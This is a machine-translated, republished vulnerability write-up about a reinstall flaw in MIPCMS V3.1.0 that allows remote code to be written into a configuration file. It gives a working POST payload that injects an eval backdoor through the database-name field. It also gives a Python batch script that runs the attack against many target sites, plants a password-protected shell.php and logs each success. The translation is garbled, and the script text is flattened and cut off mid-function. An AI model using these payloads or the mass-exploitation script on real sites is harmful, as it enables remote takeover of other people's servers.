Shulou(Shulou.com)05/31 Report--

Editor to share with you MIPCMS V3.1.0 remote write configuration file Getshell process example analysis, I believe that most people do not know much about it, so share this article for your reference, I hope you will learn a lot after reading this article, let's go to know it!

0x02 environment

Program source code download: http://www.mipcms.cn/mipcms-3.1.0.zip

Web environment: Deepin Linux+Apache2+PHP5.6+MySQL (192.168.1.101)

Remote database server: Windows 10 x64 (192.168.1.102)

0x03 vulnerability exploitation process

Let's install the program normally first.

two。 Open remote access on the remote database server, and then create a database named test',1= > eval (file_get_contents ('php://input')),' 2database = >'on it.

3. Browser access: http://www.getpass.test//index.php?s=/install/Install/installPost

POST:

Username=admin&password=admin&rpassword=admin&dbport=3306&dbname=test',1= > eval (file_get_contents ('php://input')),' 2percent = >'& dbhost=192.168.1.102&dbuser=root&dbpw=root

Remember that the database corresponds to the information of your remote database server!

You can see a sentence that writes the eval function into the configuration file.

4. Execute the code. I will explain the specific principle of constructing poc later in detail.

Browser access: http://www.getpass.test/system/config/database.php

POST:phpinfo ()

Knowledge supplement of 0x04 framework

There are others who may not know much about the framework of thinkPHP. I would like to explain briefly here that it is best to go to the official interpretation of https://www.kancloud.cn/manual/thinkphp5/118003.

First of all, we now modify the following two to true in the configuration file / system/config/config.php of thinkPHP

Then open the website (which has just been built and not yet installed), and it will automatically jump to the installation page. After making the settings just now, a small green hat will appear in the lower right corner. Click to see the loading process of the file.

There are a lot of files that will be preloaded. We will mainly look at its routing file Route.php.

We can see that the install.lock file is checked to see if it exists, and if not, it jumps to the installation interface to install it.

0x05 vulnerability code analysis process

The / app/install/controller/Install.php problem occurs in this file, which checks the existence of the install.lock here in index, but there is no check or correlation in the installPost method, and it is skipped directly in the install.html, resulting in a reinstallation of the program.

Let's just read the following code in order. I've commented it out. There are two points:

One is to traverse the contents of the database. I output a screenshot of $matches for you to understand.

two。 Another is the replacement of the configuration file, read $conf = str_replace ("# {$key} #", $value, $conf); I took a screenshot of the configuration by the way.

0x06 Payload construction

From the above code analysis, we can see that the values that must be passed in are

Username password rpassword dbport dbname dbhost dbuser dbpw

The user name and password can be written freely, but the database cannot proceed when you don't know the database information, because through the above code analysis, if the database connection is not successful, it will exit.

Look at the method of cousin Bypass, I thought, damn gb, I didn't think of this method, wocao. Dbhost can fill in the server address, we can build one on a server and then connect to it, ha.

The problem of the database is solved, how can we write it into the database file? There are these values written inside, the database server address and user name password can not be moved, because the Mysql user default is 16 bits, can modify the number of digits, but the database will automatically convert to., the database password is encrypted, and the modification of the parameter prefix will cause errors in the creation of the table, resulting in the program can not be executed normally.

Then the information we construct and write into it can't destroy the structure inside, so we can only use dbname.

3. There is another problem, even if we directly construct a sentence Trojan, because the conversion lowercase is used in the above $dbname=strtolower (input ('post.dbname')), so the $_ POST and $_ GET of a sentence cannot be used, we can also use the PHP protocol php://input to accept the value and then use eval and assert to execute.

I will not explain this agreement here. There is an article in the forum devoted to this, and it is quite detailed: https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=27441

4. From the above code analysis, we can see that the replacement value is followed by a', so we need to correspond to test',1= > eval (file_get_contents ('php://input')),' 2percent = >'

Final Payload:

Username=admin&password=admin&rpassword=admin&dbport=3306&dbname=test',1= > eval (file_get_contents ('php://input')),' 2percent = >'& dbhost=192.168.1.102&dbuser=root&dbpw=root

0x07 writes batch getshell scripts with Python

I wrote the configuration inside, need to modify the database information directly in the code to change, if added to the parameters will be more troublesome.

#! / usr/bin/env#author:F0rmatimport sysimport requestsimport threadingdef exploit (target): dbhost='192.168.1.102' dbuser = 'root' dbpw =' root' dbport=3306 dbname= "test',1= > eval (file_get_contents ('php://input')) '2percent = >' "if sys.argv [1] ="-f ": target=target [0] url1=target+" / index.php?s=/install/Install/installPost "data= {" username ":" admin "," password ":" admin "," rpassword ":" admin "," dbport ": dbport," dbname ": dbname," dbhost ": dbhost," dbuser ": dbuser "dbpw": dbpw,} payload = "fwrite (fopen ('shell.php','w'),' f0rmat') "url2=target+" / system/config/database.php "shell = target+'/system/config/shell.php' try: requests.post (url1,data=data). Content requests.post (url2, data=payload) verify = requests.get (shell, timeout=3) if" f0rmat "in verify.content: print 'Write success,shell url:',shell,'pass:f0rmat' with open (" success.txt ") "a +") as f: f.write (shell+' pass:f0rmat'+ "\ n") else: print target,'Write failure Except Exception, e: print edef main (): if len (sys.argv)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.